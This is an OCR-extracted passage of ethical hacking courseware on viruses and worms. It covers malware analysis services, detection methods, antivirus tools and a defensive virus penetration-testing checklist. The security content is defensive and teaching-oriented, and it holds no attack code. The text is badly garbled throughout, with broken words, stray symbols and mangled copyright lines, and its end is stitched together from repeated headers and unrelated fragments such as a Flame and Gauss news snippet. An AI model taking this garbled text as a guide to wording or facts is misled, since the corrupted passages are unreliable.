( J ___ I Online m alware analysis services allow you to scan files and resources and secure them before attackers attack and c o m p ro m is e them. A few online m alware analysis services are listed as follows: 0 0 0 0 0 0 0 0 0 0 Anubis: Analyzing U nknown Binaries available at http://anubis.iseclab.org Avast! Online Scanner available at http://onlinescan.avast.com M a lw are Protection Center available at https://w ww .m icrosoft.com ThreatExpert available at http://w w w .threatexpert.com Dr. W e b Online Scanners available at http://vm s.drweb.com Metascan Online available at http://w w w .m etascan-online.com Bitdefender QuickScan available at http://w w w .bitdefender.com GFI SandBox available at http://www.gfi.com U p loa d M a lw are.com available at http://w w w .uploadm alw are.com Fortinet available at http://ww w.fortiguard.com
Module 07 Page 1095
o d u l e
F l o w
C E H
C opyright by E & C a in c il. A ll Rights Reserved. Reproduction is S trictly Prohibited.
M o d u le F lo w
So far, w e have discussed various viruses and w orm s and m alware analysis. N ow we will discuss the counterm easures to be applied to protect against viruses and worms, if any are found. These counterm easures help in enhancing security.
Types o f Viruses
Counterm e a sures
P e ne tratio n Testing
This section highlights various virus and w orm countermeasures.
Module 07 Page 1096
i r u s
e t e c t i o n
e t h o d s
C E H
S can n in g
In te g rity C h eck in g
In te rc e p tio n
Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the
Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors
The interceptor monitors the operating system requests that are written to the disk
Copyright by EtGlUiCil. All Rights Reserved. Reproduction is Strictly Prohibited.
V iru s D e te c tio n M e th o d s
A virus scanner is an im portant piece of software that one should have installed on the PC. If there is no scanner, there is high chance that the system can be hit by and suffer from a virus. A virus p ro te c to r should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. A n tiviru s so ftw a re is of no use if it does not know w hat to look for in the latest virus. One should always re m e m be r that an antivirus program cannot stop everything. The rule of thum b is if an email looks like a suspicious one, e.g., if one is not expecting an email from the sender or does not know the sender or if the header looks like som ething that a known sender w ould not norm ally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The M y D o o m and W 3 2 .N o v a rg .A @ m m w orm s infected many Internet users recently. These w orm s infected most users through email. The three best m ethods for antivirus detection are: Scanning Q Integrity checking
Interception In addition, a com bination of som e of these techniques can be m ore effective.
Module 07 Page 1097
S c a n n in g
Q The m om ent a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus). The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search m e m ory files and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected. 0 Virus writers often create many new viruses by altering the existing one. W ha t looks like a new virus, may have taken just a few minutes to be created. A tta ck e rs make these changes frequently to throw off the scanners. In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file. In another possibility, the scanner sets up a virtual com puter in the RA M and tests the programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and rem ove messages that might contain a c om pute r virus or other unwanted content. e The major advantages of scanners are: They can check programs before they are executed. Q Q It is the easiest way to check new software for any known or m alicious virus.
The major drawbacks to scanners are: Q Old scanners could prove to be unreliable. W ith the trem endous increase in new viruses old scanners can quickly becom e obsolete. It is best to use the latest scanners available on the market. Q Even a new scanner is never eq u ip p e d to handle all new challenges, since viruses appear m ore rapidly than new scanners can be developed to battle them.
In te g rity C h e c k in g
0 Integrity checking products perform their functions by reading and recording integrated data to develop a signature or base line for those files and system sectors. Q Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the a m ount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established base line.
Module 07 Page 1098
A disadvantage of a basic integrity checker is that it cannot differentiate file c o rruption caused by a bug from corruption caused by a virus.
However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers com bine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.
In te rc e p tio n
0 Q The main use of an interceptor is for deflecting logic bom bs and Trojans. The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct instructions for input and output instructions by the virus. In some cases, the virus is capable of disabling the m on ito rin g program itself. Some years back it took only eight bytes of code for a w idely used antivirus program to turn off its m onitoring functions.
Module 07 Page 1099
V iru s a n d W o rm s C o u n te rm e a s u re s
C E H
Install anti-virus software that detects and removes infections as they appear
Generate an anti-virus policy for safe computing and distribute it to the staff
Pay attention to the instructions while downloading files or any programs from the Internet
Update the anti-virus software regularly Avoid opening the attachments received from an unknown sender as viruses spread via e-mail attachments Possibility of virus infection may corrupt data, thus regularly maintain data back up
Schedule regular scans for all drives after the installation of anti-virus software Do not accept disks or programs without checking them first using a current version of an antivirus program
V iru s a n d W o rm s C o u n te r m e a s u r e s
Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be m inim ized. Some of these m ethods include: 0 0 Install antivirus software that detects and removes infections as they appear Generate an antivirus policy for safe co m p u tin g and distribute it to the staff Pay attention to the instructions while d o w n lo a d in g files or any programs Internet 0 Update the antivirus softw a re on the a m onthly basis, so that it can identify and clean out new bugs 0 Avoid opening the attachm ents received from an unknow n sender as viruses spread via email attachm ents 0 0 0 Possibility of virus infection may corrupt data, thus regularly maintain data back up Schedule regular scans for all drives after the installation of antivirus software Do not accept disks or program s w ithou t checking them first using acurrent version of an antivirus program from the
Module 07 Page 110 0
V iru s a n d W o rm s C o u n te rm e a s u re s
(Cont'd)
E H
Ensure the executable code sent to the organization is approved
Run disk clean up, registry scanner and defragmentation once a week
Do not boot the machine with infected bootable system disk
Turn on the firew all if the OS used is Windows XP
Know about the latest virus threats
Run anti-spyware or adware once in a week
Check the DVD and CDs for virus infection
Block the files with more than one file type extension
Q W
Ensure the pop-up blocker is turned on and use an Internet firewall
Be cautious with the files being sent through the instant messenger
^1
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
V i r u s a n d W o r m s C o u n t e r m e a s u r e s ( C o n t d )
0 0 0 0 0 0 0 0 0 0 Ensure the executable code sent to the organization is approved Run disk clean up, registry scanner, and d e fra g m en ta tio n once a w eek Do not boot the machine with infected b o o ta b le system disk Turn on the firewall if the OS used is W indow s XP Keep inform ed about the latest virus threats Run anti-spyw are or adw are once in a w eek Check the DVDs and CDs for virus infection Block the files with m ore than one file type extension Ensure the pop-up blocker is turned on and use an Internet firew all Be cautious w ith the files being sent through the instant messenger
Module 07 Page 1101
C o m p a n io n
A n tiv iru s : I m m u n e t
C E H
Im m u n e t1
A Community! < 2 I1M ycom m unity
| -o l t I G re p h IM otires || t-njneiC o T i-n iritrN o fic e s
Community
2.478,268 people protected
Computerl
2 0 2
Product
f 'rr1o rP fn -ri
Sum m ary 1D tU le d H fc to ry
( C u e ra -^ v * J ) j
Immunet 1
P 9 * V C C t >
Îjilf
Scan
Scan Complete
Res Seamed: Threars Defected: Threats Removed: llapsed lime: Yow Kjn hconvi*1 K l. Threat* wwe detected and jc U a n * c 203228 306 396 0:4:49
10 y s /2 0 12 6 :* s :s 0 P w
Ia* st sranrK vl
Maximize Y
Uoorade to immunet Plus 3.0 and you wtH recave: ^ AntMrusiAnawywaco Email Da'jbaw Sunt I iy Advanced RootkitRemoval Enhanced Comota Th d Br *offline protection Technical Suppot I
^ J TaT
Scan History |
h ttp : //w w w .im m u n e t.c o m

C o m p a n io n A n tiv iru s: I m m u n e t
Source: h ttp://w w w .im m u net.com Com panion Antivirus means that Im m unet is com patible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are under protected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protects detection pow er relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides p ro te ction w hen not connected to the Internet.
Module 07 Page 1102
ImmunGtlO
$d ,
FIGURE 7.33: Immunet Screenshot
Module 07 Page 1103
n t i - v i r u s
T o o l s
C E H
Urt 1fw< ilhiul lUtbM
AVG Antivirus
h ttp ://fre e . avg. com
F-Secure Anti-Virus
http://ww w.fsecure, com
BitDefender
h ttp ://w w w . bit defender, com
N i
Avast Pro Antivirus

h ttp ://w w w . avas t. com
Kaspersky Anti-Virus
' 12/ . h ttp://w w w .kaspersky.com
McAfee AntiVirus Plus 2013
http://hom e.m cafee.com
Trend Micro Internet Security Pro

h ttp ://a p a c. trendmicro. com
E
!y 9 |
ESET Smart Security 6

h ttp://w w w .eset.com
Norton AntiVirus
h ttp ://w w w . s ymantec. com
Total Defense Internet Security Suite

http://w w w .totaldefense.com
A n tiv iru s T o o ls
Antivirus tools prevent, detect, and rem ove viruses and other m alicious code from your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these to o ls m o n ito r the netw ork's traffic for m alicious activities. A few antivirus tools that can be used for the purpose of detecting and killing the viruses in the systems are listed as follows: 0 0 0 0 0 0 0 0 0 0 AVG Antivirus available at http://free.avg.com BitDefender available at http://w w w .bitdefender.com Kaspersky Anti-Virus available at http://www.kaspersky.com Trend M ic ro Internet Security Pro available at http://apac.trendm icro.com Norton Anti-Virus available at http://w ww .svm antec.com F-Secure Anti-Virus available at http://www.f-secure.com Avast Pro Antivirus available at http://www.avast.com M c A fe e Anti-Virus Plus 2013 available at http://hom e.m cafee.com ESET Smart Security 5 available at http://www .eset.com Total Defense Internet Security Suite available at http://w w w .totaldefense.com
Module 07 Page 1104
o d u l e
F l o w
C E H
C o u n te r m e a su re s
Copyright by R-Cm BCI. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
Penetration testing must be conducted against viruses and worms, as they are the most w idely used means of attack. They do not require extensive k now le dge to use. Hence, you should conduct pen testing on your system or netw ork before a real attacker exploits it
Types o f Viruses
Coun te rm e a su re s
^ Z )P e n etratio n Testing
This section provides insight into virus and w orm pen testing.
Module 07 Page 1105
Viruses and Worms
P e n e t r a t i o n
T e s t i n g
f o r V i r u s
C E H
Install an anti-virus program on the network infrastructure and on the end-user's system Update the anti-virus software to update your virus database of the newly identified viruses Scan the system for viruses, which helps to repair damage or delete files infected with viruses
v
i\
V IR U S
Copyright by EC -C a11actl. All Rights Reserved. Reproduction is Strictly Prohibited.
P e n e tra tio n T e s tin g fo r V iru se s

Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs you to test the netw ork for any viruses and w orm s that could dam age or steal the organization's inform ation. You need to construct viruses and w orm s and try to inject them in a d u m m y netw ork (virtual machine) and check w h e the r they are detected by antivirus programs or able to bypass the netw ork firewall. As a pen tester, you should carry out the follow ing steps to conduct a virus penetration test: S t e p l: Install an antivirus program You should install an antivirus program on the netw ork infrastructure and on the end-user's system before conducting the penetration test. Step2: U pdate the antiviru s softw a re Check w h ether your antivirus is updated or not. If not, update your antivirus softw are. Step3: Scan the system fo r viruses You should try to scan your target system; this will help you to repair dam age or delete files infected with viruses.
Module 07 Page 110 6

T e s t i n g
f o r V i r u s (C ontd)
C E H
> System is not infected
Set the anti-virus to quarantine or delete the virus
Virus is removed?
>
System is safe
V ___ Go to safe mode and delete the infected file manually
IX
Set the anti-virus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible or delete them if not Ifth e virus is not removed then go to safe mode and delete the infected file manually
P e n e t r a t i o n T e s t i n g f o r V i r u s e s ( C o n t d )
Step4: Set the antivirus to qu a ra n tin e or delete the virus Set your antivirus software to com pare file contents with the known c om puter virus signatures, identify infected files, qu a ra n tine and repair them if possible, or delete them if not. Step5: Go to safe m o d e and delete the infected file m anu a lly Ifthe virus is not removed, then go to safe m ode and delete the infected file manually.
Module 07 Page 1107
T e s t i n g
9
UrtifM
H | tU tk m
itkiul
Use tools such as What's Running and Winsonar
Scan th e system fo r ru n n in g processes, registry e ntries, sta rtu p program s, file s and fo ld e rs in te g rity and services
If a ny suspicious process, registry entry, s ta rtu p program o r service is discovered, check th e associated e x e c u ta b le files
Use tools such as jv l6 PowerTools 2012 and Reg Organizer

0
C ollect m o re in fo rm a tio n a b o u t th e se fro m pub lish er's w e bsites if available, and In te rn e t
Scan fo r W indow s services
Use tools such as SrvManand ServiWin
Check th e s ta rtu p program s and d e te rm in e if all th e program s in th e list can be recognized w ith know n fu n c tio n a litie s
Scan fo r sta rtu p programs
Use tools such as Starter, Security AutoRun, and Autoruns
Check th e data files fo r m o d ific a tio n o r m a n ip u la tio n by o p e ning several files and com p a rin g hash value o f th e se files w ith a p re -c o m p u te d hash
Scan fo r file s and fold ers in te g rity
<
Use tools such as FCIV, TRIPWIRE, and SIGVERIF
Step 6: Scan the system fo r running processes You should scan your system for suspicious running process. You can do this by using tools such as W hat's Running, HijackThis, etc. Step7: Scan the system fo r suspicious registry entries You should scan your system for suspicious registry entries. You can do this by using tools such as JV P o w e r Tools and RegShot. Step8: Scan the system fo r W in d o w s services You should scan suspicious W in d o w s services running on your system. You can do this by using tools such as S rv M a n and ServiW in. Step9: Scan the system fo r startup program s You should scan your system for suspicious startup program s running on your system. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs. Step 10: Scan the system fo r files and fo lders integrity You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF.
Module 07 Page 1108
T e s t i n g
0 Check the critical OS file modification or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy Document all your findings in previous steps; it helps in determining the next action if viruses are identified in the system Isolate infected system from the network im mediately to prevent further infection Sanitize the complete system for viruses using an updated anti-virus
Scan for modification to OS files
Use tools such as FCIV and TRIPWIRE
v
Document all the findings
8 t)
Find other anti-virus solution to clean viruses
Isolate the machine from network
Update and run antivirus
Step 11: Scan the system fo r critical OS m od ificatio n s You can scan critical OS file m odifications or m anipulation using tools such as TRIPWIRE or manually com paring hash values if you have a backup copy. Step 12: D o cu m e n t all findings These findings can help you determ ine the next action if viruses are identified on the system. S te p l3 : Isolate the infected system Once an infected system is identified, you should isolate the infected system from the netw ork im m ediately in order to pre ve nt further infection. S te p l4 : Sanitize the c o m p le te infected system You should rem ove virus infections from your system by using the latest updated antivirus software.
Module 07 Page 1109
Viruses and Worms
o d u l e
S u m
a r y
| 0
Virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre determine logical circumstance is met Viruses are categorized according to file they infect and the way they work Lifecycle of virus and worms include designing, replication, launching, detection, incorporation and elimination stages Computer gets infected by Virus, worms and other malware due to not running the latest anti-virus application, not updating and not installing new versions of plug-ins, installing the pirated software, opening the infected e-mail attachments or downloading files without checking properly for the source Several virus and worm development kits such as JPS Virus Maker are available in wild that can be used create malware without any technical knowledge Virus detection methods include system scanning, file integrity checking and monitoring OS requests Virus and worm countermeasures include installing anti-virus software and following anti-virus policy for safe computing
M o d u le S u m m a ry
A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas w orm s are malicious programs that replicate, execute, and spread across the n e tw o rk conne ctio ns independently w ithout human interaction. Some viruses affect com puters as soon as their code is executed; other viruses lie dorm ant until a p re -de te rm in e d logical circum stance is met. Viruses are categorized according to file they infect and the way they work. The lifecycle of virus and w orm s include designing, replication, launching, detection, incorporation, and e lim in a tio n stages. A c om puter gets infected by viruses, worms, and other m alware due to not running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or dow nloading files w ithout checking p ro pe rly for the source. Several virus and w orm d e v e lo p m e n t kits such as JPS Virus M a k e r are available in the wild that can be used create m alware w ithou t any technical knowledge.
Module 07 Page 1 1 1 0

Virus
detection
m ethods
include
system
scanning,
file
integrity
checking,
and
m onitoring OS requests. Virus and w orm counte rm e a sures include installing antivirus software and following antivirus policies for safe computing.
Module 07 Page 1111

CEHv8 Module 07 Viruses and Worms

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CEHv8 Module 07 Viruses and Worms

Uploaded by

Copyright:

Available Formats

Viruses and Worms

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

V iru s e s and W orm s

Engineered by Hackers. Presented by Professionals.

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

^ ^ ^ ^ T h e a n a l y s i s a lso s h o w e d n e w e v id e n c e o f c o o p e ra tio n b e tw e e n th e c r e a to r s o f F lam e a n d G a u s s ^ ^ ^ ^ ^

d e s c r ib e d as "a s m a ll a n d h ig h ly f le x ib le m a lic io u s p r o g r a m d e s ig n e d t o ste a l d a ta a n d c o n t r o l in fe c te d s y s te m s d u r in g ta rg e te d cyber e s p io n a g e o p e ra tio n s ," K a sp e rsky Lab said in a

s t a t e m e n t p o s te d o n its w e b s i t e . The m a lw a re w a s o r i g i n a l l y i d e n t if ie d as an a p p e n d a g e o f F lam e, t h e p ro g ra m u sed f o r

t a r g e t e d c y b e r e s p io n a g e in t h e M i d d l e East a n d a c k n o w l e d g e d t o be p a r t o f j o i n t US-lsraeli e f f o r t s t o u n d e r m i n e Ira n 's n u c l e a r p r o g r a m .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

C opyright 2 0 0 5 -2 0 1 2G lo b a lR e se a rch .ca

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

O n lin e M a lw a r e A n a ly s is S e rvice s V iru s a n d W o rm s C o u n te rm e a s u re s A n tiv ir u s T o o ls P e n e tra tio n T e s tin g f o r V iru s

C o p y rig h t b y EC -C auactl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

V iru se s? 0 0 Modute07 V ir u s A n a ly s is T y p e s o f V iru s e s !M a k e r

Ethical H a ck if^ a n J P ( f i W ^ t F ^ J i a W e T e M m g t f 0 P yV t f l t t 1 n c i l All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

P e n e tra tio n T e s tin g

C o p y rig h t b y R - C m B C I . A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

In tro d u c tio n to V iru s e s

Infects Other Program

Corrupts Files and Programs

C o p y rig h t b y EC -C auactl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

FIGURE 7 .1 : V iru s a n d W o rm S ta tis tic s

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

E lim in a tio n U sers install a n tiv iru s u p d a te s a n d e lim in a te th e virus th r e a ts

In c o rp o ra tio n A ntivirus s o f tw a r e d e v e lo p e rs a ss im ila te d e fe n s e s a g a in s t th e virus

D e te c tio n A virus is id e n tified a s th r e a t in fectin g ta r g e t s y ste m s

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

E lim in a tio n : Users a re a d v is e d t o in s ta ll a n t i v i r u s s o f t w a r e u p d a te s , t h u s c r e a t i n g a w a r e n e s s a m o n g user g ro up s

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2-50 C ertified Ethical H acker

In th e in fe c tio n p h a s e , th e v iru s r e p lic a te s its e lf a n d a tta c h e s to a n .exe file in th e s y s te m

C o p y rig h t b y EC -C auactl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

P h a s e u sin g v a r io u s m e th o d s . They a tta c h

Ethical H acking a n d C o u n te rm e a s u re s C opyright by E C - C 0 U n C il All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

FIGURE 7 .2 : W o rk in g o f V iru s e s in In fe c tio n Phase

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

C o p y rig h t b y E & C a u a c tl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker

C o p y rig h t b y E & C a u a c tl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s

Exam 3 1 2 -5 0 C ertified Ethical H acker